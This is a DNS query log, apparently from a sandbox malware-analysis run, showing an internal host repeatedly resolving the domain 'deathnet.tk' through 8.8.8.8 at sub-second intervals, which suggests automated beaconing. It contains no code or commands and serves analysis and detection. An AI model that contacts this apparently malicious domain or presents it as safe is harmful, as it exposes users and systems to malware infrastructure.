              Mar 21, 2022 20:08:14.989860058 CET192.168.2.238.8.8.80x3ca3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.033456087 CET192.168.2.238.8.8.80xe3e7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.079637051 CET192.168.2.238.8.8.80x2b25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.125428915 CET192.168.2.238.8.8.80x380dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.170183897 CET192.168.2.238.8.8.80xddd1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.213023901 CET192.168.2.238.8.8.80x4b7eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.258786917 CET192.168.2.238.8.8.80xbc1cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:15.303901911 CET192.168.2.238.8.8.80xab4eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.349741936 CET192.168.2.238.8.8.80xa3fcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.393286943 CET192.168.2.238.8.8.80xf05cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.440335989 CET192.168.2.238.8.8.80xd4ceStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.484150887 CET192.168.2.238.8.8.80x1515Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.530775070 CET192.168.2.238.8.8.80x3000Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.575880051 CET192.168.2.238.8.8.80xb8dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.620934010 CET192.168.2.238.8.8.80x724fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.668298960 CET192.168.2.238.8.8.80x707dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.714118004 CET192.168.2.238.8.8.80x75ddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.760395050 CET192.168.2.238.8.8.80xcad8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.805970907 CET192.168.2.238.8.8.80x1b44Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.853774071 CET192.168.2.238.8.8.80x50d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.896806002 CET192.168.2.238.8.8.80x314aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.945086002 CET192.168.2.238.8.8.80xb908Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:16.992404938 CET192.168.2.238.8.8.80xb6dcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.037671089 CET192.168.2.238.8.8.80xccc2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.080545902 CET192.168.2.238.8.8.80xaedfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.123472929 CET192.168.2.238.8.8.80x1263Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.169199944 CET192.168.2.238.8.8.80xac9aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.214123011 CET192.168.2.238.8.8.80x3034Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.257333040 CET192.168.2.238.8.8.80x6d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.305655003 CET192.168.2.238.8.8.80x1bb8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.353956938 CET192.168.2.238.8.8.80x7818Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.398435116 CET192.168.2.238.8.8.80xcb86Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.441410065 CET192.168.2.238.8.8.80x7b16Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.490519047 CET192.168.2.238.8.8.80x2900Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.532800913 CET192.168.2.238.8.8.80xef00Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.575293064 CET192.168.2.238.8.8.80xb348Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.620337963 CET192.168.2.238.8.8.80x36d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.669313908 CET192.168.2.238.8.8.80xd23fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.717545986 CET192.168.2.238.8.8.80x7985Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.763755083 CET192.168.2.238.8.8.80x5962Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.809683084 CET192.168.2.238.8.8.80x26e5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.855367899 CET192.168.2.238.8.8.80x79d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.899413109 CET192.168.2.238.8.8.80x61efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.945638895 CET192.168.2.238.8.8.80x6281Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:17.992830992 CET192.168.2.238.8.8.80x427Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.041558027 CET192.168.2.238.8.8.80x666eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.088527918 CET192.168.2.238.8.8.80xcdfbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.137367964 CET192.168.2.238.8.8.80x1f6aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.182818890 CET192.168.2.238.8.8.80xfc47Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.228445053 CET192.168.2.238.8.8.80x12fbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.275652885 CET192.168.2.238.8.8.80xeb96Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.319432974 CET192.168.2.238.8.8.80x7a01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.364661932 CET192.168.2.238.8.8.80x8b19Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.412657022 CET192.168.2.238.8.8.80xe986Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.462584972 CET192.168.2.238.8.8.80x8c94Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.510747910 CET192.168.2.238.8.8.80x98edStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.558808088 CET192.168.2.238.8.8.80x727dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.608901978 CET192.168.2.238.8.8.80xa200Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.656867981 CET192.168.2.238.8.8.80x5696Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.706377983 CET192.168.2.238.8.8.80xfd81Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.754641056 CET192.168.2.238.8.8.80x6cabStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.804054976 CET192.168.2.238.8.8.80xcb28Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.851886034 CET192.168.2.238.8.8.80x96c8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.904993057 CET192.168.2.238.8.8.80x654bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:18.952235937 CET192.168.2.238.8.8.80x50ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.003837109 CET192.168.2.238.8.8.80x1c2dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.057049990 CET192.168.2.238.8.8.80xd630Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.103096962 CET192.168.2.238.8.8.80xac98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.157098055 CET192.168.2.238.8.8.80x6b81Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.210665941 CET192.168.2.238.8.8.80x929aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.262661934 CET192.168.2.238.8.8.80xb542Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.314739943 CET192.168.2.238.8.8.80xa5a5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.361582994 CET192.168.2.238.8.8.80x4e90Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.406270027 CET192.168.2.238.8.8.80x6806Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.451982021 CET192.168.2.238.8.8.80xb376Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.497281075 CET192.168.2.238.8.8.80xe93aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.541261911 CET192.168.2.238.8.8.80x505Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.589668036 CET192.168.2.238.8.8.80xb460Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.636068106 CET192.168.2.238.8.8.80x8087Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.686496973 CET192.168.2.238.8.8.80x18a4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.731751919 CET192.168.2.238.8.8.80x511eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.783314943 CET192.168.2.238.8.8.80x4ce2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.828648090 CET192.168.2.238.8.8.80xd34bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.874454975 CET192.168.2.238.8.8.80xdf01Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.918977976 CET192.168.2.238.8.8.80xe7a8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:19.964507103 CET192.168.2.238.8.8.80x529cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.009397984 CET192.168.2.238.8.8.80xf529Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.059899092 CET192.168.2.238.8.8.80xda9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.111258984 CET192.168.2.238.8.8.80x65c7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.158144951 CET192.168.2.238.8.8.80xe0f6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.201304913 CET192.168.2.238.8.8.80xc591Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.244184017 CET192.168.2.238.8.8.80x70b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.290268898 CET192.168.2.238.8.8.80x5a44Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.334922075 CET192.168.2.238.8.8.80xc265Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.380249977 CET192.168.2.238.8.8.80xac5eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.424984932 CET192.168.2.238.8.8.80x227bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.472357988 CET192.168.2.238.8.8.80x9069Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.523473978 CET192.168.2.238.8.8.80xc94aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.593529940 CET192.168.2.238.8.8.80xeac3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.638894081 CET192.168.2.238.8.8.80xcfeeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.684776068 CET192.168.2.238.8.8.80x308aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.730500937 CET192.168.2.238.8.8.80x7171Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.777332067 CET192.168.2.238.8.8.80xce50Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.819999933 CET192.168.2.238.8.8.80x5f1dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.864286900 CET192.168.2.238.8.8.80x8445Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.908879042 CET192.168.2.238.8.8.80x130bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:20.954046965 CET192.168.2.238.8.8.80x3c24Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.002940893 CET192.168.2.238.8.8.80x84b6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.050282955 CET192.168.2.238.8.8.80xad26Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.093518019 CET192.168.2.238.8.8.80xc073Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.143429041 CET192.168.2.238.8.8.80x9e66Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.190587997 CET192.168.2.238.8.8.80x8961Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.235933065 CET192.168.2.238.8.8.80x434Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.284235001 CET192.168.2.238.8.8.80xc872Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.328867912 CET192.168.2.238.8.8.80xe8a2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.375719070 CET192.168.2.238.8.8.80x666bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.423219919 CET192.168.2.238.8.8.80xadd2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.467910051 CET192.168.2.238.8.8.80x975bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.513283014 CET192.168.2.238.8.8.80x7512Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.556756020 CET192.168.2.238.8.8.80x9b4fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.599728107 CET192.168.2.238.8.8.80xa254Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.643335104 CET192.168.2.238.8.8.80x6b10Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.692028046 CET192.168.2.238.8.8.80x9357Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.739414930 CET192.168.2.238.8.8.80x6989Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.785856962 CET192.168.2.238.8.8.80x515bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.829113007 CET192.168.2.238.8.8.80x407fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.874423981 CET192.168.2.238.8.8.80xa201Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.924166918 CET192.168.2.238.8.8.80x3b7fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:21.969258070 CET192.168.2.238.8.8.80x90d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.014468908 CET192.168.2.238.8.8.80x85Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.062640905 CET192.168.2.238.8.8.80xa18dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.106111050 CET192.168.2.238.8.8.80x1540Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.152673006 CET192.168.2.238.8.8.80x83a4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.196455002 CET192.168.2.238.8.8.80x4057Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.239137888 CET192.168.2.238.8.8.80x89feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.283454895 CET192.168.2.238.8.8.80xba4bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.330126047 CET192.168.2.238.8.8.80x35a9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.378921986 CET192.168.2.238.8.8.80xb351Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.426281929 CET192.168.2.238.8.8.80xdb02Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.473419905 CET192.168.2.238.8.8.80xa382Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.519642115 CET192.168.2.238.8.8.80xf8aaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.565593004 CET192.168.2.238.8.8.80x7b2dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.618645906 CET192.168.2.238.8.8.80xca45Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.665323019 CET192.168.2.238.8.8.80xa8adStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.713332891 CET192.168.2.238.8.8.80x1813Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.757347107 CET192.168.2.238.8.8.80x6c85Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.806947947 CET192.168.2.238.8.8.80x946bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.853343964 CET192.168.2.238.8.8.80xa4d3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.905344009 CET192.168.2.238.8.8.80x1827Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:22.951320887 CET192.168.2.238.8.8.80xe888Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.000046015 CET192.168.2.238.8.8.80x683eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.042691946 CET192.168.2.238.8.8.80x3429Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.090178967 CET192.168.2.238.8.8.80x6b66Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.134493113 CET192.168.2.238.8.8.80xbe2fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.180346012 CET192.168.2.238.8.8.80xd09dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.227406025 CET192.168.2.238.8.8.80x14bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.270818949 CET192.168.2.238.8.8.80x6edeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.318002939 CET192.168.2.238.8.8.80x7040Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.367860079 CET192.168.2.238.8.8.80x802cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.415525913 CET192.168.2.238.8.8.80xd365Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.458508015 CET192.168.2.238.8.8.80x169dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.503896952 CET192.168.2.238.8.8.80x1850Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.548621893 CET192.168.2.238.8.8.80xcbd4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.592684031 CET192.168.2.238.8.8.80x9a38Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.639415026 CET192.168.2.238.8.8.80x40b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.684751987 CET192.168.2.238.8.8.80xfa85Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.732183933 CET192.168.2.238.8.8.80xc156Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.788827896 CET192.168.2.238.8.8.80x4d19Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.835783005 CET192.168.2.238.8.8.80x1d36Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.883539915 CET192.168.2.238.8.8.80x693bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.935539961 CET192.168.2.238.8.8.80x1651Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:23.982846975 CET192.168.2.238.8.8.80x9a28Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.030047894 CET192.168.2.238.8.8.80xf389Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.074199915 CET192.168.2.238.8.8.80xbbdcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.120891094 CET192.168.2.238.8.8.80x958eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.168529987 CET192.168.2.238.8.8.80x7cd7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.214015007 CET192.168.2.238.8.8.80x5ab3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.259541988 CET192.168.2.238.8.8.80xad5eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.305228949 CET192.168.2.238.8.8.80xf51cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.353488922 CET192.168.2.238.8.8.80xd78aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.416579962 CET192.168.2.238.8.8.80x4ce3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.464274883 CET192.168.2.238.8.8.80x26a9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.509568930 CET192.168.2.238.8.8.80xf861Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.569451094 CET192.168.2.238.8.8.80xf5f3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.617203951 CET192.168.2.238.8.8.80xd584Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.663992882 CET192.168.2.238.8.8.80x2b25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.709846020 CET192.168.2.238.8.8.80x371cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.753653049 CET192.168.2.238.8.8.80x8c4aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.804419994 CET192.168.2.238.8.8.80x2a74Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.849508047 CET192.168.2.238.8.8.80xca71Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.896697044 CET192.168.2.238.8.8.80x89f2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.945862055 CET192.168.2.238.8.8.80x5a06Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:24.993328094 CET192.168.2.238.8.8.80x529dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.038564920 CET192.168.2.238.8.8.80x8c07Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.085567951 CET192.168.2.238.8.8.80xf7e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.129628897 CET192.168.2.238.8.8.80xbc87Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.176388025 CET192.168.2.238.8.8.80xdc2aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.225521088 CET192.168.2.238.8.8.80x577eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.273080111 CET192.168.2.238.8.8.80xab3eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.319233894 CET192.168.2.238.8.8.80x10cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.364038944 CET192.168.2.238.8.8.80xf8c6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.408560038 CET192.168.2.238.8.8.80xe5f5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.453824043 CET192.168.2.238.8.8.80x7b9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.499063015 CET192.168.2.238.8.8.80x84b2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.543910027 CET192.168.2.238.8.8.80xee6bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.588268995 CET192.168.2.238.8.8.80xc166Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.645112991 CET192.168.2.238.8.8.80xe815Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.690011978 CET192.168.2.238.8.8.80x5065Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.738008976 CET192.168.2.238.8.8.80x3f46Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.780637026 CET192.168.2.238.8.8.80x2bf7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.824944973 CET192.168.2.238.8.8.80x261bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.869662046 CET192.168.2.238.8.8.80xaa13Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.915623903 CET192.168.2.238.8.8.80x151cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:25.959757090 CET192.168.2.238.8.8.80x4addStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.002988100 CET192.168.2.238.8.8.80xfb3cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.046447992 CET192.168.2.238.8.8.80x8d11Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.089834929 CET192.168.2.238.8.8.80xba7aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.135277033 CET192.168.2.238.8.8.80xb422Standard query (0)deathnet.tkA (IP address)IN (0x0001)
